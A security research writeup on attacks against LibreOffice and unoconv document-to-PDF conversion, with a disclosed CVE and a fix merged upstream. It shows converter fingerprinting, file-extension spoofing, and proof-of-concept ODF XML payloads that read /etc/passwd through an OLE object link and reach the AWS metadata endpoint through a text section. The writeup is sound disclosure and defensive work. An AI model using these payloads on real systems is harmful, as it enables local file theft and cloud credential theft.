A Tale of Exploitation in Spreadsheet File Conversions


Researchers:


Intro

In our attempt to fingerprint LibreOffice as a PDF rendering service, we identified multiple implementation vulnerabilities.

This writeup covers our efforts to fingerprint LibreOffice, LibreOffice file detection (and abuse) & misuse of the LibreOffice Python-UNO bridge.

The unintended misuse of the Python-UNO bridge by the popular package unoconv resulted in CVE-2019-17400.

We believe our research here is not final, and encourage others to look into this area.

 


LibreOffice

LibreOffice is an open-source fork of OpenOffice and with some google searches you can see there are several critical CVEs for it from the past few weeks alone. LibreOffice's Github project has over 500k commits including code that has not been updated in many years. Many companies rely on using LibreOffice to export common document formats to HTML/PDF due to it allowing headless file conversions.


Fingerprinting the Spreadsheet Converter

We used the following two methods to identify & fingerprint the document rendering service on multiple websites.

 The INFO Functions

Most spreadsheet specs, such as XLSX or ODS, provide you with the INFO functions to give you some information about the software or system that opened the spreadsheet.

An important observation to note here is that many websites we came across allowed for any LibreOffice support file type to be rendered, despite limiting file extensions client-side. This allowed us to test XLSX uploads. (more on this below)

This is a useful identifier for a few reasons. The =INFO("osversion") function has a hard-coded value for OpenOffice/LibreOffice. OpenOffice and older versions of Libre return an error for INFO functions it does not support where LibreOffice after 2015 will display "#N/A". These small nuances provide the opportunity to create an XLSX file that can be used to get a better idea of what is processing the spreadsheets on the server.

Here are the fingerprints we ended up using:

Where cell c4 is =INFO("DIRECTORY")

Label Function
Is OpenOffice -or- Libre prior to 2015? =IF(ISNUMBER(SEARCH("Err:502",C4)), "True", "False")
Is LibreOffice? =IF(ISNUMBER(SEARCH("#",C4)), "True", "False")
Is Excel? =IF(ISNUMBER(SEARCH("\",C4)), "True", "False")

The check on OpenOffice is due to Libre's fork off of OpenOffice and eventually adding a resulting #N/A if you call an Excel INFO function that is not supported by OO/Libre. This was added in this commit: https://github.com/LibreOffice/core/commit/db6a928a420868b2a80ba11c8d46151d16c13624. So there is no guarantee, but it could be useful in determining whether you might want to try some older Libre CVEs or not.

Also worth noting is that recently Libre started to put a git hash as their version, so INFO("release") will help you find the exact versions of the software being used.

In addition to fingerprinting the app doing the conversion, it will also tell you a few other things. A useful one is the OSVERSION as it will tell you the operating system behind it (WIN, LINUX, SOLARIS) which could be useful recon data for tailoring exploits to the server. Another useful one specific to Excel is DIRECTORY which tells you the current working directory giving you a bit of a path disclosure or Windows username depending on the file location.

PDF Metadata

Due to most of the applications using OpenOffice/LibreOffice to export XLSX/DOCX to PDF, if the application delivers you a raw PDF back from the conversion, it will likely contain metadata such as the version of LibreOffice being used.
This was the case with Slack, e.g.

https://files.slack.com/files-pri/[filehash]/download/asdf.odt_converted.pdf

Resulted in:

 


A Common Extension Pitfall

During our initial testing, we observed one website that would only render documents with an .xlsx extension. This website would then render the file using LibreOffice. We then created an ODS document and renamed it to use an XLSX extension instead. Poof! It was now returning the preview of the ODS document.
This is the entry point for exploitation of Open/LibreOffice conversions.

Some applications are taking files you upload with XLSX or DOCX extensions and passing them into OpenOffice without performing strong file format validation or configuring filters safely. When these files are handed off for conversion, the conversion flow used is determined by file contents rather than extension.


LibreOffice/OpenOffice File Detection

Please note that we do not have high confidence in our code analysis.

When you pass files through soffice with the --convert-to and --headless arguments, it runs through a flow of code to determine what type of file you are passing into it. In our research, a vast majority of these are outputting to PDF which can be summarized with this flow:

  • If no hard filter is specified, it tells it to guess the file format
  • It checks the file extension of the file passed into it
  • It checks a filter based on the file contents (such as magic headers)
  • It has a list of file formats it supports and ranks them based on complexity. For example, it'll work on detecting if it's a complex XML format such as docbook before falling back to XML or HTML.
  • If the extension and filter do not match, it falls back to relying solely on the filter guess

https://github.com/LibreOffice/core/blob/master/desktop/source/app/dispatchwatcher.cxx#L595

OUString aParam = aDispatchRequest.aPrinterName;
sal_Int32 nFilterIndex = aParam.indexOf( ':' );

bool bGuess = false;

if( nFilterIndex >= 0 ) {
    ...
} else {
    // Guess
    bGuess = true;
    aFilterExt = aParam.copy( 0, nPathIndex );
}

If a filter is not specified in the URI, it enables the guess file format flow.

if ( bGuess ) {
    ...
    aFilter = impl_GuessFilter( aOutFile, aDocService );
}

OUString impl_GuessFilter( const OUString& rUrlOut, const OUString& rDocService ) {
    std::shared_ptr pOutFilter = impl_getExportFilterFromUrl( rUrlOut, rDocService );
    ...
}

std::shared_ptr impl_getExportFilterFromUrl( const OUString& rUrl, const OUString& rFactory) {
    try {
        const Reference< XComponentContext > xContext( comphelper::getProcessComponentContext() );
        const Reference< document::XTypeDetection > xTypeDetector( xContext->getServiceManager()->createInstanceWithContext( "com.sun.star.document.TypeDetection", xContext ), UNO_QUERY_THROW );
        const OUString aTypeName( xTypeDetector->queryTypeByURL( rUrl ) );

At this point, it's relying on a set of configurable filters based on com.sun.star.document.TypeDetection. These filters are used to determine file type, which can be roughly summarized as checking for magic header bytes or hard-coded strings in the file contents. That means if you are taking in word docs or spreadsheets and exporting to PDF, it will completely negate the docx or xlsx extensions and guess what the file format if it does not detect the xlsx or docx file headers.

Here is an example of Encapsulated PostScript (EPFS):

bool GraphicFormatDetector::checkEPS()
{
    if ((mnFirstLong == 0xC5D0D3C6)
        || (ImplSearchEntry(maFirstBytes.data(), reinterpret_cast("%!PS-Adobe"),
                            10, 10)
            && ImplSearchEntry(&maFirstBytes[15], reinterpret_cast("EPS"), 3, 3)))
    {
        msDetectedFormat = "EPS";
        return true;
    }
    return false;
}

As you can see you cannot just throw `PS-Adobe` in a text file and convert it. It is also checking if `EPS` follows after the PS-Adobe header. Once you determine how the file detection is taking place for specific file formats, you can start to exploit that file format if the conversion taking place allows it.


File Formats Supported By LibreOffice

The file formats supported by LibreOffice is around 100. There are far too many to cover, so I'll leave the link to the Wiki table here:

https://en.wikipedia.org/wiki/LibreOffice#Supported_file_formats

You'll need to click the "Show" link to expand the table.


Ghost(script) in the Excel

One of the first things that jumped out to us in the supported file formats is that LibreOffice supports EPFS which means PostScript/Ghostscript. There have been some fun exploits in Ghostscript the past few years and it's also one of the only file formats supported (that we could identify) that allows some raw scripting to interact with files or execute commands.

Using a Ghostscript payload, we were able to achieve file read and write.

The code for this payload can be found here:

Credits to Cody Brocious (daeken) for getting the Ghostscript payload working.

One thing we learned about LibreOffice is that although EPFS files were being processed by LibreOffice, there was no guarantee that it would lead to Ghostscript. This is due to a hierarchy system of EPFS parsing:

pstoedit, convert (a part of ImageMagick), and GhostScript (gs or gswin32c) are tried in that order on all platforms. The first one that is available will be used to render the preview

More information on that flow here:

But, EPFS just hands off postscript to other applications, there is no guarantee that there is a binary on the system that will handle the postscript you pass into it. In these cases, you need to find an alternative route for exploitation.


Slack, OLE Objects, and Text Sections

With the LibreOffice fingerprint spreadsheet file, we started to check other websites that may also use LibreOffice in a similar way. We accidentally discovered that Slack is using LibreOffice (while sharing files using Slack...). Our LFI Ghostscript payload did not work, so we had to find a different exploit chain with Libre.

Below we go over the specific details of the OLE Object xLinks and Text Section exploits we used to read local file contents and capture AWS credentials.


LFD/SSRF - Remote OLE Object xLinking

This is akin to the =WEBSERVICE LFD/SSRF vulnerability (CVE-2018-6871). In LibreOffice documents you are able to embed OLE Objects inside of the documents. This also supports remote objects that update when the document is opened. Although LibreOffice docs contain some features that may allow this, such as floating frames (conversions of iframes), you may not get them to render when converted to a PDF document.

OLE Objects in LibreOffice work by fetching the contents of the remote URL and displaying the contents inside of a frame. The OLE objects are embedded in the content.xml of the LibreOffice files. By default, these x-href links will not update on conversion. In fact, in OpenOffice/LibreOffice, most of the time you need to enable link updates manually after you open the document. This brings us to the popular Universal Office Converter (unoconv), but more on that later in the blog post.

As long as x-href updates are enabled, you will be able to fetch arbitrary contents. This can be seen by creating the following PoC:

PoC Steps

  1. Create a new spreadsheet in LibreOffice
  2. Insert -> object -> ole object -> create from file
  3. Checkbox "link to file"
  4. Enter a url to an actual file (libre will fail on a 404)
  5. Save the odt file
  6. Open the odt file with zip tool like 7zip
  7. Modify content.xml, replacing the url with "file:///etc/passwd".
    • * find: `<draw:object xlink:href="https://[your server]/[your file]" xlink:type="simple" xlink:show="embed" xlink:actuate="onLoad"/>`
    • * replace: `<draw:object xlink:href="file:///etc/passwd" xlink:type="simple" xlink:show="embed" xlink:actuate="onLoad"/>`
  8. Replace the content.xml in the odt file with your newly edited one
  9. Rename file to test.odt.xlsx
  10. Upload to a vulnerable web server that processes the document.
  11. ---> You can see the contents of /etc/passwd.

If you view content.xml in the OpenOffice file format (zip), the OLE object works like the following:

<draw:frame draw:style-name="fr1" draw:name="Object1" text:anchor-type="paragraph" svg:width="6.6925in" svg:height="1.1791in" draw:z-index="0"><draw:object xlink:href="file:///etc/passwd" xlink:type="simple" xlink:show="embed" xlink:actuate="onLoad"/><draw:image xlink:href="./ObjectReplacements/Object 1" xlink:type="simple" xlink:show="embed" xlink:actuate="onLoad"/></draw:frame>

The xlink:href is fetched when the document is converted based on the xlink:actuate onLoad trigger.

However, there is a problem with this vector. OLE Objects with remote links update when the document is opened and this resets the formatting. The default formatting will only allow you to view 2-3 lines of text. There may be a way to circumvent this, but after many failed attempts we decided to look for an alternative.


 

SSRF and LFD with Text Sections

After reading the documentation, we discovered that OFD files have a features that support the xlink hrefs as well.

Source: http://www.datypic.com/sc/odf/a-xlink_href.html

One of these features is called text sectionsFrom here we were able to construct a payload that allowed arbitrary read in a default styling that displayed the full contents. This feature also allows the same file:// access as OLE objects..

<office:text>
    <text:section text:name="string">
        <text:section-source xlink:href="http://169.254.169.254/latest/meta-data/ xlink:type="simple" xlink:show="embed" xlink:actuate="onLoad"/>
    </text:section>
</office:text>

From here we got what we needed:

This exploit ended up working on another program, but it is one that we are unable to disclose. So text-sections are a good test to try if Ghostscript fails, but remember that it relies on link updates to be enabled whether manually in commandline or via a library that explicitly forces links to update.


Universal Office Converter aka the unoconv pyuno rabbit-hole

Project Repository: https://github.com/unoconv/unoconv

Description: Universal Office Converter (unoconv) is a command line tool to convert any document format that LibreOffice can import to any document format that LibreOffice can export. It makes use of the LibreOffice’s UNO bindings for non-interactive conversion of documents.

In the case of Slack and a few others, the problem was their usage of libraries that used unoconv. Although at its core it is just a service that sits on top of Libre and OpenOffice.

After reviewing the unoconv code, we realized that it's using a bridge in order to access OpenOffice API's in Python. This took us down even further into the rabbit-hole. Welcome to the PyUNO Bridge.

Info:

The vulnerability in x-href links ended up being caused by unoconv's silent updating of external links.

https://github.com/unoconv/unoconv/blob/master/unoconv#L972

            inputprops = UnoProps(Hidden=True, ReadOnly=True, UpdateDocMode=QUIET_UPDATE)

https://www.openoffice.org/api/docs/common/ref/com/sun/star/document/MediaDescriptor.html#UpdateDocMode

If you look into the UpdateDocMode, you'll see that QUIET_UPDATE specifies the following: "Update document if it does not require a dialog. Otherwise do not update. For example a link to a database can require a dialog to get password for an update.". Updating external links has a button you press as a security concern, but it is not considered a required dialog option. Thus unoconv will silently update all external links during the conversion process.

Unoconv also has an “updateLinks” phase as well which would also update the document with remote links: https://github.com/unoconv/unoconv/blob/release-0.8/unoconv#L986 (warning: old branch)

We worked a maintainer for unoconv to modify the default behavior to a safer option: https://github.com/unoconv/unoconv/pull/510

This has been integrated into unoconv 0.9.


OpenOffice Macro CVEs

You might be pointing out that LibreOffice has a lot of CVEs, some of them that automatically execute basic or Python code via the macro system. These have been found a couple of times, even quite recent to our research with CVE 2019-9848.

It's important to note that our research and attacks are purely taking place in the conversion process of a headless OpenOffice or Libre binary. The binary we are focusing on is soffice with the --headless launch argument & uonconv/PyUNO.

In our testing we found that these exploits did not work during conversion or when a preview of the document is generated. We don't know the specifics of this, but it looks like event handlers or macros are not executed directly when LibreOffice is running in --headless or --invisible mode.


Closing Thoughts

To recap our findings on LibreOffice -- EPSF rendering can hit Ghostscript in uncommon circumstances & it is not safe to silently update links in a document you do not trust.
LibreOffice has had many CVEs in the past, some of them very similar to what we are writing about in this blog post. The concept of an LFD, SSRF, or even RCE via macros is nothing that has not been seen before. The takeaway is that there are many websites relying on libraries that are complex and filled with many nuances that may get lost or not seen when implementing them into applications.

Some companies are openly parsing libre documents directly and others are making mistakes passing certain extensions into libre on accident. However, some of them are relying on sandboxing and/or jails to prevent meaningful exploitation even if you execute code in that environment.

We would like to encourage any developer reading this to sandbox document parsing / PDF rendering as much as possible. We believe the risk here can be considered comparable to image processing with ImageMagick (see ImageTragick).

Going forward, it would be interesting to see more research on:

  • Oasis file spec
  • LibreOffice/OpenOffice file detection and parsing
  • Implementation of PyUNO Bridge and OpenOffice API calls
  • Any vulnerability in the common code path used by the --headless conversion process would likely impact every use of LibreOffice online